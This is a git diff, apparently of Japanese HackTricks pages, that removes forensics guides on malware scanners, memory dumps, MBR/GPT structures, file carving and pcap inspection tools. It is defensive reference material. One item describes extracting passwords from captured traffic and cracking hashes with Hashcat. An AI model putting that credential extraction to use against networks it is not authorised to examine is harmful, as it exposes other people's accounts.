yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: マルウェアのチェックとルールの作成
バイナリから yara ルールを生成するためにツール [**YaraGen**](https://github.com/Neo23x0/yarGen) を使用できます。これらのチュートリアルをチェックしてください: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
```
### ClamAV
#### インストール
```
sudo apt-get install -y clamav
```
#### スキャン
```bash
sudo freshclam #Update rules
clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa** は、実行可能ファイルPE、ELF、.NET内の潜在的に悪意のある **機能** を検出します。したがって、Att\&ck 戦術や次のような疑わしい機能を見つけることができます:
- OutputDebugString エラーのチェック
- サービスとして実行
- プロセスの作成
[**Github リポジトリ**](https://github.com/mandiant/capa) から入手できます。
### IOCs
IOC は、妥協の指標Indicator Of Compromiseを意味します。IOC は、潜在的に望ましくないソフトウェアや確認された **マルウェア** を特定するための **条件のセット** です。ブルーチームは、この種の定義を使用して、**システム** や **ネットワーク** 内のこの種の悪意のあるファイルを **検索** します。\
これらの定義を共有することは非常に有用で、コンピュータ内でマルウェアが特定され、そのマルウェアの IOC が作成されると、他のブルーチームはそれを使用してマルウェアをより迅速に特定できます。
IOC を作成または修正するためのツールは [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**です。**\
[**Redline**](https://www.fireeye.com/services/freeware/redline.html) などのツールを使用して、**デバイス内の定義された IOC を検索** できます。
### Loki
[**Loki**](https://github.com/Neo23x0/Loki) は、単純な妥協の指標をスキャンするツールです。\
検出は、4つの検出方法に基づいています
```
1. File Name IOC
Regex match on full file path/name
2. Yara Rule Check
Yara signature matches on file data and process memory
3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) は、GNU GPLv2 ライセンスの下でリリースされた Linux 用のマルウェアスキャナーで、共有ホスティング環境で直面する脅威に基づいて設計されています。ネットワークエッジ侵入検知システムからの脅威データを使用して、攻撃に積極的に使用されているマルウェアを抽出し、検出のためのシグネチャを生成します。さらに、脅威データは、LMD チェックアウト機能を使用したユーザーの提出やマルウェアコミュニティリソースからも得られます。
### rkhunter
[**rkhunter**](http://rkhunter.sourceforge.net) のようなツールは、ファイルシステムに対して可能な **rootkits** とマルウェアをチェックするために使用できます。
```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss)は、さまざまな技術を使用して実行可能ファイル内の難読化された文字列を見つけようとするツールです。
### PEpper
[PEpper](https://github.com/Th3Hurrican3/PEpper)は、実行可能ファイル内の基本的な情報バイナリデータ、エントロピー、URLおよびIP、いくつかのyaraルールをチェックします。
### PEstudio
[PEstudio](https://www.winitor.com/download)は、インポート、エクスポート、ヘッダーなどのWindows実行可能ファイルの情報を取得できるツールですが、ウイルス総合チェックも行い、潜在的なAtt\&ck技術を見つけます。
### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/)は、ファイルが**暗号化**されているかどうかを検出し、**パッカー**を見つけるためのツールです。
### NeoPI
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI)は、テキスト/スクリプトファイル内の**難読化**された**暗号化**されたコンテンツを検出するためにさまざまな**統計的方法**を使用するPythonスクリプトです。NeoPIの目的は、**隠れたウェブシェルコードの検出**を支援することです。
### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder)は、**難読化**された/**怪しいコード**や、**マルウェア**/ウェブシェルでよく使用される**PHP**関数を使用しているファイルを検出するために最善を尽くします。
### Apple Binary Signatures
いくつかの**マルウェアサンプル**をチェックする際は、**バイナリの署名**を常に**確認**するべきです。署名した**開発者**がすでに**マルウェア**に関連している可能性があります。
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
#Check if the apps contents have been modified
codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app
```
## 検出技術
### ファイルスタッキング
ウェブサーバーの**ファイル**を含むフォルダーが**最終更新された日付**を知っている場合、**ウェブサーバーのすべてのファイル**が作成および変更された**日付**を**確認**し、いずれかの日付が**疑わしい**場合は、そのファイルを確認してください。
### ベースライン
フォルダーのファイルが**変更されるべきではなかった**場合、フォルダーの**元のファイル**の**ハッシュ**を計算し、**現在の**ものと**比較**できます。変更されたものは**疑わしい**です。
### 統計分析
情報がログに保存されている場合、各ウェブサーバーのファイルがどれだけアクセスされたかなどの**統計**を**確認**できます。ウェブシェルの一つである可能性が高いです。
{{#include ../../banners/hacktricks-training.md}}

37
src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
View File

@ -1,37 +0,0 @@
# メモリダンプ分析
{{#include ../../../banners/hacktricks-training.md}}
## 開始
**マルウェア**をpcap内で**検索**し始めます。[**マルウェア分析**](../malware-analysis.md)で言及されている**ツール**を使用してください。
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
**Volatilityはメモリダンプ分析のための主要なオープンソースフレームワークです**。このPythonツールは、外部ソースやVMware VMからのダンプを分析し、ダンプのOSプロファイルに基づいてプロセスやパスワードなどのデータを特定します。プラグインで拡張可能であり、法医学的調査に非常に柔軟です。
**[ここにチートシートがあります](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## ミニダンプクラッシュレポート
ダンプが小さい場合数KB、場合によっては数MBこれはおそらくミニダンプクラッシュレポートであり、メモリダンプではありません。
![](<../../../images/image (216).png>)
Visual Studioがインストールされている場合、このファイルを開いてプロセス名、アーキテクチャ、例外情報、実行中のモジュールなどの基本情報をバインドできます
![](<../../../images/image (217).png>)
例外をロードしてデコンパイルされた命令を見ることもできます
![](<../../../images/image (219).png>)
![](<../../../images/image (218) (1).png>)
いずれにせよ、Visual Studioはダンプの深さの分析を行うための最良のツールではありません。
**IDA**または**Radare**を使用して**深く**検査するべきです。
{{#include ../../../banners/hacktricks-training.md}}

234
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View File

@ -1,234 +0,0 @@
# パーティション/ファイルシステム/カービング
{{#include ../../../banners/hacktricks-training.md}}
## パーティション
ハードドライブまたは**SSDディスクは、データを物理的に分離する**ために異なるパーティションを含むことができます。\
ディスクの**最小**単位は**セクター**通常は512Bで構成されていますです。したがって、各パーティションのサイズはそのサイズの倍数である必要があります。
### MBRマスターブートレコード
これは**ブートコードの446Bの後のディスクの最初のセクターに割り当てられています**。このセクターは、PCにどのパーティションをどこからマウントするかを示すために重要です。\
最大で**4つのパーティション**を許可します(**アクティブ/ブート可能**なのは最大で**1つ**のみ)。ただし、より多くのパーティションが必要な場合は、**拡張パーティション**を使用できます。この最初のセクターの**最終バイト**はブートレコード署名**0x55AA**です。アクティブとしてマークできるのは1つのパーティションのみです。\
MBRは**最大2.2TB**を許可します。
![](<../../../images/image (489).png>)
![](<../../../images/image (490).png>)
MBRの**バイト440から443**の間には**Windowsディスク署名**が見つかりますWindowsが使用されている場合。ハードディスクの論理ドライブレターはWindowsディスク署名に依存します。この署名を変更すると、Windowsが起動しなくなる可能性がありますツール: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**。
![](<../../../images/image (493).png>)
**フォーマット**
| オフセット | 長さ | アイテム |
| ------------ | --------- | ---------------------- |
| 0 (0x00) | 446(0x1BE)| ブートコード |
| 446 (0x1BE) | 16 (0x10) | 最初のパーティション |
| 462 (0x1CE) | 16 (0x10) | 2番目のパーティション |
| 478 (0x1DE) | 16 (0x10) | 3番目のパーティション |
| 494 (0x1EE) | 16 (0x10) | 4番目のパーティション |
| 510 (0x1FE) | 2 (0x2) | 署名 0x55 0xAA |
**パーティションレコードフォーマット**
| オフセット | 長さ | アイテム |
| ------------ | -------- | ---------------------------------------------------------- |
| 0 (0x00) | 1 (0x01) | アクティブフラグ (0x80 = ブート可能) |
| 1 (0x01) | 1 (0x01) | 開始ヘッド |
| 2 (0x02) | 1 (0x01) | 開始セクター (ビット0-5); シリンダの上位ビット (6-7) |
| 3 (0x03) | 1 (0x01) | 開始シリンダの最下位8ビット |
| 4 (0x04) | 1 (0x01) | パーティションタイプコード (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | 終了ヘッド |
| 6 (0x06) | 1 (0x01) | 終了セクター (ビット0-5); シリンダの上位ビット (6-7) |
| 7 (0x07) | 1 (0x01) | 終了シリンダの最下位8ビット |
| 8 (0x08) | 4 (0x04) | パーティション前のセクター (リトルエンディアン) |
| 12 (0x0C) | 4 (0x04) | パーティション内のセクター |
LinuxでMBRをマウントするには、まず開始オフセットを取得する必要があります`fdisk``p`コマンドを使用できます)
![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
その後、次のコードを使用します。
```bash
#Mount MBR in Linux
mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA (論理ブロックアドレッシング)**
**論理ブロックアドレッシング** (**LBA**) は、コンピュータストレージデバイスに保存されたデータブロックの位置を指定するために使用される一般的なスキームであり、通常はハードディスクドライブなどの二次ストレージシステムに関連しています。LBAは特にシンプルな線形アドレッシングスキームであり、**ブロックは整数インデックスによって位置付けられ**、最初のブロックはLBA 0、2番目はLBA 1、というように続きます。
### GPT (GUIDパーティションテーブル)
GUIDパーティションテーブル、通称GPTは、MBRマスターブートレコードと比較してその強化された機能のために好まれています。GPTは、**パーティションのためのグローバルに一意の識別子**を持つことが特徴であり、いくつかの点で際立っています:
- **位置とサイズ**: GPTとMBRは両方とも**セクター0**から始まります。しかし、GPTは**64ビット**で動作し、MBRは32ビットです。
- **パーティション制限**: GPTはWindowsシステムで最大**128パーティション**をサポートし、最大**9.4ZB**のデータを収容できます。
- **パーティション名**: 最大36のUnicode文字でパーティションに名前を付けることができます。
**データの耐障害性と回復**:
- **冗長性**: MBRとは異なり、GPTはパーティショニングとブートデータを単一の場所に制限しません。ディスク全体にこのデータを複製し、データの整合性と耐障害性を向上させます。
- **循環冗長検査 (CRC)**: GPTはデータの整合性を確保するためにCRCを使用します。データの破損を積極的に監視し、検出された場合、GPTは別のディスク位置から破損したデータを回復しようとします。
**保護MBR (LBA0)**:
- GPTは保護MBRを通じて後方互換性を維持します。この機能はレガシーMBRスペースに存在しますが、古いMBRベースのユーティリティが誤ってGPTディスクを上書きするのを防ぐように設計されており、したがってGPTフォーマットのディスク上のデータ整合性を保護します。
![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (491).png>)
**ハイブリッドMBR (LBA 0 + GPT)**
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
**BIOS**サービスを介して**GPTベースのブート**をサポートするオペレーティングシステムでは、最初のセクターは**ブートローダー**コードの最初のステージを保存するためにも使用される可能性がありますが、**GPT** **パーティション**を認識するように**修正**されています。MBRのブートローダーは、512バイトのセクターサイズを仮定してはなりません。
**パーティションテーブルヘッダー (LBA 1)**
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
パーティションテーブルヘッダーは、ディスク上の使用可能なブロックを定義します。また、パーティションテーブルを構成するパーティションエントリの数とサイズを定義しますテーブルのオフセット80および84
| オフセット | 長さ | 内容 |
| --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8バイト | シグネチャ ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h または 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)リトルエンディアンマシン上) |
| 8 (0x08) | 4バイト | バージョン 1.0 (00h 00h 01h 00h) for UEFI 2.8 |
| 12 (0x0C) | 4バイト | ヘッダーサイズリトルエンディアン、バイト単位、通常は5Ch 00h 00h 00hまたは92バイト |
| 16 (0x10) | 4バイト | [CRC32](https://en.wikipedia.org/wiki/CRC32) ヘッダーのCRCオフセット +0 からヘッダーサイズまで)リトルエンディアンで、このフィールドは計算中にゼロにされます |
| 20 (0x14) | 4バイト | 予約; ゼロでなければなりません |
| 24 (0x18) | 8バイト | 現在のLBAこのヘッダーコピーの位置 |
| 32 (0x20) | 8バイト | バックアップLBA他のヘッダーコピーの位置 |
| 40 (0x28) | 8バイト | パーティションのための最初の使用可能LBAプライマリパーティションテーブルの最後のLBA + 1 |
| 48 (0x30) | 8バイト | 最後の使用可能LBAセカンダリパーティションテーブルの最初のLBA 1 |
| 56 (0x38) | 16バイト | ディスクGUIDミックスエンディアン |
| 72 (0x48) | 8バイト | パーティションエントリの配列の開始LBA常にプライマリコピーで2 |
| 80 (0x50) | 4バイト | 配列内のパーティションエントリの数 |
| 84 (0x54) | 4バイト | 単一のパーティションエントリのサイズ通常は80hまたは128 |
| 88 (0x58) | 4バイト | リトルエンディアンのパーティションエントリ配列のCRC32 |
| 92 (0x5C) | \* | 予約; ブロックの残りの部分はゼロでなければなりません512バイトのセクターサイズの場合420バイト; ただし、より大きなセクターサイズではより多くなる可能性があります) |
**パーティションエントリ (LBA 233)**
| GUIDパーティションエントリフォーマット | | |
| --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- |
| オフセット | 長さ | 内容 |
| 0 (0x00) | 16バイト | [パーティションタイプGUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (ミックスエンディアン) |
| 16 (0x10) | 16バイト | 一意のパーティションGUID (ミックスエンディアン) |
| 32 (0x20) | 8バイト | 最初のLBA ([リトルエンディアン](https://en.wikipedia.org/wiki/Little_endian)) |
| 40 (0x28) | 8バイト | 最後のLBA含む、通常は奇数 |
| 48 (0x30) | 8バイト | 属性フラグ(例: ビット60は読み取り専用を示す |
| 56 (0x38) | 72バイト | パーティション名36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LEコードユニット |
**パーティションタイプ**
![](<../../../images/image (492).png>)
より多くのパーティションタイプは[https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)にあります。
### 検査
[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/)を使用してフォレンジックイメージをマウントした後、Windowsツール[**Active Disk Editor**](https://www.disk-editor.org/index.html)**を使用して最初のセクターを検査できます**。次の画像では、**セクター0**で**MBR**が検出され、解釈されました:
![](<../../../images/image (494).png>)
もしそれが**MBRの代わりにGPTテーブル**であった場合、**セクター1**にシグネチャ_EFI PART_が表示されるはずです前の画像では空です
## ファイルシステム
### Windowsファイルシステムリスト
- **FAT12/16**: MSDOS, WIN95/98/NT/200
- **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
- **ExFAT**: 2008/2012/2016/VISTA/7/8/10
- **NTFS**: XP/2003/2008/2012/VISTA/7/8/10
- **ReFS**: 2012/2016
### FAT
**FAT (ファイルアロケーションテーブル)**ファイルシステムは、そのコアコンポーネントであるファイルアロケーションテーブルをボリュームの開始位置に配置するように設計されています。このシステムは、**2つのコピー**のテーブルを維持することによってデータを保護し、1つが破損してもデータの整合性を確保します。テーブルとルートフォルダーは**固定位置**に存在する必要があり、これはシステムの起動プロセスにとって重要です。
ファイルシステムの基本的なストレージ単位は**クラスター、通常は512B**であり、複数のセクターで構成されています。FATはバージョンを通じて進化してきました
- **FAT12**、12ビットのクラスターアドレスをサポートし、最大4078クラスターUNIXでは4084を処理します。
- **FAT16**、16ビットアドレスに拡張され、最大65,517クラスターを収容します。
- **FAT32**、32ビットアドレスでさらに進化し、ボリュームごとに驚異的な268,435,456クラスターを許可します。
FATバージョン全体にわたる重要な制限は、**最大ファイルサイズ4GB**であり、これはファイルサイズストレージに使用される32ビットフィールドによって課せられています。
特にFAT12およびFAT16のルートディレクトリの主要なコンポーネントには以下が含まれます
- **ファイル/フォルダー名**最大8文字
- **属性**
- **作成、変更、最終アクセス日**
- **FATテーブルアドレス**(ファイルの開始クラスターを示す)
- **ファイルサイズ**
### EXT
**Ext2**は、**ジャーナリング**しないパーティション(**あまり変更されないパーティション**)に最も一般的なファイルシステムであり、ブートパーティションのようなものです。**Ext3/4**は**ジャーナリング**を行い、通常は**残りのパーティション**に使用されます。
## **メタデータ**
いくつかのファイルにはメタデータが含まれています。この情報はファイルの内容に関するものであり、ファイルタイプによってはアナリストにとって興味深い情報を持っている場合があります。例えば、以下のような情報が含まれることがあります:
- タイトル
- 使用されたMS Officeバージョン
- 著者
- 作成日および最終変更日
- カメラのモデル
- GPS座標
- 画像情報
[**exiftool**](https://exiftool.org)や[**Metadiver**](https://www.easymetadata.com/metadiver-2/)のようなツールを使用して、ファイルのメタデータを取得できます。
## **削除ファイルの回復**
### ログされた削除ファイル
前述のように、ファイルが「削除」された後でも、いくつかの場所にファイルがまだ保存されています。これは通常、ファイルシステムからファイルを削除することが単に削除としてマークされるだけで、データは触れられないためです。したがって、ファイルのレジストリMFTのようなを検査し、削除されたファイルを見つけることが可能です。
また、OSは通常、ファイルシステムの変更やバックアップに関する多くの情報を保存しているため、それらを使用してファイルまたはできるだけ多くの情報を回復しようとすることが可能です。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### **ファイルカービング**
**ファイルカービング**は、**データの塊の中からファイルを見つけようとする技術**です。このようなツールが機能する主な方法は3つあります**ファイルタイプのヘッダーとフッターに基づく**、ファイルタイプの**構造に基づく**、および**コンテンツ自体に基づく**。
この技術は**断片化されたファイルを回収するためには機能しない**ことに注意してください。ファイルが**連続したセクターに保存されていない**場合、この技術はそれを見つけることができないか、少なくともその一部を見つけることができません。
ファイルカービングに使用できるツールはいくつかあり、検索したいファイルタイプを指定できます。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### データストリーム **C**arving
データストリームカービングはファイルカービングに似ていますが、**完全なファイルを探すのではなく、興味深い情報の断片を探します**。\
例えば、ログされたURLを含む完全なファイルを探すのではなく、この技術はURLを検索します。
{{#ref}}
file-data-carving-recovery-tools.md
{{#endref}}
### セキュア削除
明らかに、ファイルやそのログの一部を**「安全に」削除する**方法があります。例えば、ファイルの内容をジャンクデータで数回上書きし、その後**$MFT**や**$LOGFILE**からファイルに関する**ログを削除**し、**ボリュームシャドウコピーを削除**することが可能です。\
この操作を行っても、**ファイルの存在がまだログされている他の部分があるかもしれない**ことに気付くかもしれませんが、それは真実であり、フォレンジック専門家の仕事の一部はそれらを見つけることです。
## 参考文献
- [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
- [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
- [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
- [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
- **iHackLabs Certified Digital Forensics Windows**
{{#include ../../../banners/hacktricks-training.md}}

87
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View File

@ -1,87 +0,0 @@
# ファイル/データ カービング & 回復ツール
{{#include ../../../banners/hacktricks-training.md}}
## カービング & 回復ツール
More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
### Autopsy
フォレンジックで画像からファイルを抽出するために最も一般的に使用されるツールは [**Autopsy**](https://www.autopsy.com/download/) です。ダウンロードしてインストールし、ファイルを取り込んで「隠れた」ファイルを見つけます。Autopsyはディスクイメージやその他の種類のイメージをサポートするように構築されていますが、単純なファイルには対応していないことに注意してください。
### Binwalk <a href="#binwalk" id="binwalk"></a>
**Binwalk** は、埋め込まれたコンテンツを見つけるためにバイナリファイルを分析するツールです。`apt`を介してインストール可能で、そのソースは [GitHub](https://github.com/ReFirmLabs/binwalk) にあります。
**Useful commands**:
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
### Foremost
もう一つの一般的なツールは**foremost**です。foremostの設定ファイルは`/etc/foremost.conf`にあります。特定のファイルを検索したい場合は、それらのコメントを外してください。何もコメントを外さなければ、foremostはデフォルトで設定されたファイルタイプを検索します。
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
### **Scalpel**
**Scalpel**は、**ファイルに埋め込まれたファイル**を見つけて抽出するために使用できる別のツールです。この場合、抽出したいファイルタイプを設定ファイル(_/etc/scalpel/scalpel.conf_)からコメント解除する必要があります。
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
### Bulk Extractor
このツールはkaliに含まれていますが、ここで見つけることができます: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
このツールはイメージをスキャンし、その中にある**pcaps**、**ネットワーク情報URL、ドメイン、IP、MAC、メール**、およびその他の**ファイル**を**抽出**します。あなたがする必要があるのは:
```
bulk_extractor memory.img -o out_folder
```
すべての情報(パスワード?)をツールが収集した中からナビゲートし、パケットを分析します(**Pcaps analysis**を参照)。奇妙なドメイン(**マルウェア**や**存在しない**ドメインに関連する)を検索します。
### PhotoRec
[https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)で見つけることができます。
GUIとCLIのバージョンが付属しています。PhotoRecが検索する**ファイルタイプ**を選択できます。
![](<../../../images/image (524).png>)
### binvis
[コード](https://code.google.com/archive/p/binvis/)と[ウェブページツール](https://binvis.io/#/)を確認してください。
#### BinVisの特徴
- 視覚的でアクティブな**構造ビューワー**
- 異なる焦点のための複数のプロット
- サンプルの一部に焦点を当てる
- PEまたはELF実行可能ファイルの**文字列とリソース**を見る
- ファイルの暗号解析のための**パターン**を取得
- パッカーまたはエンコーダアルゴリズムを**特定**
- パターンによるステガノグラフィの**識別**
- **視覚的**なバイナリ差分
BinVisは、ブラックボックスシナリオで未知のターゲットに慣れるための素晴らしい**出発点**です。
## 特定のデータカービングツール
### FindAES
AESキーのスケジュールを検索することでAESキーを検索します。TrueCryptやBitLockerで使用される128、192、256ビットのキーを見つけることができます。
[こちらからダウンロード](https://sourceforge.net/projects/findaes/)。
## 補完ツール
ターミナルから画像を見るために[**viu**](https://github.com/atanunq/viu)を使用できます。\
PDFをテキストに変換して読むために、Linuxコマンドラインツール**pdftotext**を使用できます。
{{#include ../../../banners/hacktricks-training.md}}

65
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
View File

@ -1,65 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
# カービングツール
## Autopsy
フォレンジックで画像からファイルを抽出するために最も一般的に使用されるツールは[**Autopsy**](https://www.autopsy.com/download/)です。ダウンロードしてインストールし、ファイルを取り込んで「隠れた」ファイルを見つけてください。Autopsyはディスクイメージやその他の種類のイメージをサポートするように構築されていますが、単純なファイルには対応していません。
## Binwalk <a id="binwalk"></a>
**Binwalk**は、画像や音声ファイルのようなバイナリファイル内の埋め込まれたファイルやデータを検索するためのツールです。`apt`でインストールできますが、[ソース](https://github.com/ReFirmLabs/binwalk)はgithubで見つけることができます。
**便利なコマンド**:
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
もう一つの一般的なツールは **foremost** です。foremost の設定ファイルは `/etc/foremost.conf` にあります。特定のファイルを検索したい場合は、それらのコメントを外してください。何もコメントを外さない場合、foremost はデフォルトで設定されたファイルタイプを検索します。
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
## **スカルペル**
**スカルペル**は、**ファイルに埋め込まれたファイル**を見つけて抽出するために使用できる別のツールです。この場合、抽出したいファイルタイプを設定ファイル \(_/etc/scalpel/scalpel.conf_\) からコメント解除する必要があります。
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
このツールはKaliに含まれていますが、ここでも見つけることができます: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
このツールはイメージをスキャンし、その中にある**pcaps**を**抽出**し、**ネットワーク情報URL、ドメイン、IP、MAC、メール**やその他の**ファイル**を取得します。あなたがする必要があるのは:
```text
bulk_extractor memory.img -o out_folder
```
すべての情報をナビゲートします(パスワード?)、パケットを分析します(読み取り[ **Pcaps analysis**](../pcap-inspection/index.html))、奇妙なドメインを検索します(**マルウェア**や**存在しない**ドメインに関連する)。
## PhotoRec
[https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) で見つけることができます。
GUIとCLIバージョンが付属しています。PhotoRecが検索する**ファイルタイプ**を選択できます。
![](../../../images/image%20%28524%29.png)
# 特定のデータカービングツール
## FindAES
AESキーのスケジュールを検索することでAESキーを検索します。TrueCryptやBitLockerで使用される128、192、256ビットのキーを見つけることができます。
[こちらからダウンロード](https://sourceforge.net/projects/findaes/)。
# 補完ツール
[**viu**](https://github.com/atanunq/viu)を使用してターミナルから画像を見ることができます。
Linuxコマンドラインツール**pdftotext**を使用してPDFをテキストに変換し、読むことができます。
{{#include ../../../banners/hacktricks-training.md}}

212
src/forensics/basic-forensic-methodology/pcap-inspection/README.md
View File

@ -1,212 +0,0 @@
# Pcap Inspection
{{#include ../../../banners/hacktricks-training.md}}
> [!NOTE]
> **PCAP**と**PCAPNG**についての注意: PCAPファイル形式には2つのバージョンがあります; **PCAPNGは新しく、すべてのツールでサポートされているわけではありません**。他のツールで作業するために、Wiresharkや他の互換性のあるツールを使用してPCAPNGからPCAPにファイルを変換する必要があるかもしれません。
## Online tools for pcaps
- pcapのヘッダーが**壊れている**場合は、次のリンクを使用して**修正**を試みるべきです: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
- [**PacketTotal**](https://packettotal.com)でpcap内の**情報**を抽出し、**マルウェア**を検索します。
- [**www.virustotal.com**](https://www.virustotal.com)と[**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)を使用して**悪意のある活動**を検索します。
## Extract Information
次のツールは、統計、ファイルなどを抽出するのに役立ちます。
### Wireshark
> [!NOTE]
> **PCAPを分析する場合、基本的にWiresharkの使い方を知っておく必要があります**
Wiresharkのトリックを見つけることができます:
{{#ref}}
wireshark-tricks.md
{{#endref}}
### Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(Linuxのみ)_は、**pcap**を**分析**し、そこから情報を抽出することができます。たとえば、pcapファイルからXplicoは、各メールPOP、IMAP、SMTPプロトコル、すべてのHTTPコンテンツ、各VoIP通話SIP、FTP、TFTPなどを抽出します。
**Install**
```bash
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
sudo apt-get update
sudo apt-get install xplico
```
**実行**
```
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
_**127.0.0.1:9876**_ に _**xplico:xplico**_ の資格情報でアクセスします。
次に、**新しいケース**を作成し、ケース内に**新しいセッション**を作成し、**pcap**ファイルを**アップロード**します。
### NetworkMiner
Xplicoと同様に、**pcaps**からオブジェクトを**分析および抽出**するためのツールです。無料版があり、[**こちら**](https://www.netresec.com/?page=NetworkMiner)から**ダウンロード**できます。**Windows**で動作します。\
このツールは、パケットから**他の情報を分析**して、何が起こっていたのかを**より迅速に**把握するのにも役立ちます。
### NetWitness Investigator
[**NetWitness Investigatorをこちらからダウンロード**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware)できます。**(Windowsで動作します)**。\
これは、パケットを**分析**し、情報を有用な形で整理して、**内部で何が起こっているかを知る**ための別の便利なツールです。
### [BruteShark](https://github.com/odedshimon/BruteShark)
- ユーザー名とパスワードの抽出とエンコード (HTTP, FTP, Telnet, IMAP, SMTP...)
- 認証ハッシュを抽出し、Hashcatを使用してクラックします (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
- ビジュアルネットワークダイアグラムを構築 (ネットワークノードとユーザー)
- DNSクエリを抽出
- すべてのTCPおよびUDPセッションを再構築
- ファイルカービング
### Capinfos
```
capinfos capture.pcap
```
### Ngrep
pcap内で**何か**を**探している**場合は、**ngrep**を使用できます。以下は主要なフィルターを使用した例です:
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### カービング
一般的なカービング技術を使用することで、pcapからファイルや情報を抽出するのに役立ちます
{{#ref}}
../partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
### 認証情報のキャプチャ
